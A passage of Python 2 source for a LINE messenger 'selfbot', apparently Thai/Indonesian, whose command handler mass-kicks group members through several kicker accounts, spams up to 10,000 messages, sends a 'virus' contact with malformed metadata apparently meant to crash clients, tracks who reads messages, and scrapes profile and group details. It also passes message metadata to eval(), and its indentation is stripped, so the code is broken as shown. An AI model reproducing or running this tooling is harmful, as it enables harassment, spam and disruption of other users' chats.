elif msg.text in ["mybackup","Mebb"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#=================================================
elif msg.text == "#mid on":
cl.sendText(msg.to, "Done..")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "#mid off":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "%s\n\n%s\nReadig point creation:\n [%s]\n" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#========================================
#-------------------Fungsi spam finish----------------------------
elif "Gpict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "Bot off" in msg.text:
if msg.from_ in admsa:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------
elif msg.text in ["ลิ้ง","url"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nline://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนmybot","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนmybotเเล้ว")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนmybot","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนmybotเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนmybotเเล้ว")
#=================================================
elif "Spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif msg.text in ["เปิดหมด","Phet All on","Phet all on"]:
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn on all protection")
cl.sendText(msg.to,"Qr:on")
cl.sendText(msg.to,"Backup:on")
cl.sendText(msg.to,"Read:on")
cl.sendText(msg.to,"Respon:on")
cl.sendText(msg.to,"Responkick:on")
cl.sendText(msg.to,"Protect:on")
cl.sendText(msg.to,"Namelock:on")
cl.sendText(msg.to,"Blockinvite:on")
elif msg.text in ["ปิดหมด","Phet All off","Phet all off"]:
cl.sendText(msg.to,"[DPK🐲BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn off all protection")
cl.sendText(msg.to,"Qr:off")
cl.sendText(msg.to,"Backup:off")
cl.sendText(msg.to,"Read:off")
cl.sendText(msg.to,"Respon:off")
cl.sendText(msg.to,"Responkick:off")
cl.sendText(msg.to,"Protect:off")
cl.sendText(msg.to,"Namelock:off")
cl.sendText(msg.to,"Blockinvite:off")
cl.sendText(msg.to,"Link off")
elif msg.text in ["Team"]:
msg.contentType = 13
cl.sendText(msg.to, "[TEAM DPK🐲BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to, "ผู้สร้าง.. DPK🐲BOT\nBy.🔯ARIFISTIFIK🔯")
msg.contentMetadata = {'mid': 'u65224f4e8812136f01b25275a54b5aef'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ผู้จัดการ .DPK🐲BOT\nBy.☬ARIFISTIFIK☬")
msg.contentMetadata = {'mid': 'u6c8aab6ee167a596be2cf045ee2f90df'}
cl.sendMessage(msg)
cl.sendText(msg.to, "หวานใจ\nBy.ผู้สร้างพญาไฟ")
msg.contentMetadata = {'mid': 'u2743230861d1c637647d9ca2a8c1fc14'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ประธาน:")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รองประธาน:💫 By. พยัค")
msg.contentMetadata = {'mid': 'u7988143c47d3faacf1856a72011eea93'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รปภ.:DPK🐲BOT")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ตัวเเทนสมาชิก:By.บอล")
msg.contentMetadata = {'mid': 'ueabd832a84add1392a2ff758f97b3c8e'}
cl.sendMessage(msg)
#========================================
elif "virus" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to+"',"}
cl.sendMessage(msg)
elif "kickall" in msg.text:
if msg.toType == 2:
print "Kickall ok"
_name = msg.text.replace("kickall","")
gs = ki1.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
gs = ki7.getGroup(msg.to)
gs = ki8.getGroup(msg.to)
gs = ki9.getGroup(msg.to)
gs = ki10.getGroup(msg.to)
ki1.sendText(msg.to, "Hello all...😁😁 {}")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
# ki1.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki1,ki2,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
elif msg.text in ["Kill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[ki1,ki2,ki10]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("PK4 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif "KK2 " in msg.text:
nk0 = msg.text.replace("KK2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif "KK1 " in msg.text:
nk0 = msg.text.replace("KK1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "contactjoin:" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("contactjoin:","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif ("PK2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("PK3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("PK " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "สั่งดำ @" in msg.text:
_name = msg.text.replace("Blacklist @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"error")
elif "แบน @" in msg.text:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("แบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน @" in msg.text:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("ลบแบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear ban","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
#=============================================
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["เปิด อ่าน","Read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"เปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["ปิด อ่าน","Read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"ปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["Tag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["Tag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag1","Tag1"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag1"]))
elif msg.text in ["Tag2","Tag2"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag2"]))
elif "Tag1:" in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif "Tag2:" in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#==============================================================================#
#==============================================================================#
elif "Phackmid:" in msg.text:
saya = msg.text.replace("Phackmid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Phackgid:" in msg.text:
saya = msg.text.replace("#Phackgid:","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist","เช็คเพื่อนทั้งหมด","#เพื่อน","เพื่อนทั้งหมด","Fyall"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════รายชื่อเพื่อน═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อย════════\n\nเจำนวนเพื่อน : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["เพื่อน","Memlist","Nameall"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════รายชื่อเพื่อน═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อน════════\n\nจำนวนเพื่อน : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
elif "#Friendpict:" in msg.text:
saya = msg.text.replace('#Friendpict:','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Blocklist","บล็อค","Pbann"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═══════รายชื่อ ที่บล็อค═══════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n══════รายชื่อ ที่บล็อค══════\n\nจำนวนที่บล็อค : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#Myginfoall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#ไอดีกลุ่ม","Myginfogidall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="════════ไอดี กลุ่ม════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n════════ไอดี กลุ่ม═══════\n\nไอดีกลุ่มรวม : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "1991258ชื่อกลุ่ม" in msg.text:
saya = msg.text.replace('1991258ชื่อกลุ่ม','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["ลิสกลุ่ม","#Meginfoall"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "แทค" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "[SELF BOT\n[By.☬ARIFISTIFIK☬]:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["ใครอ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"llurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","Heckmic"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Phetmic " in msg.text:
cmd = msg.text.replace("Phetmic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithUrl(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithUrl(msg.to,wait["pap"])
#==============================================================================#
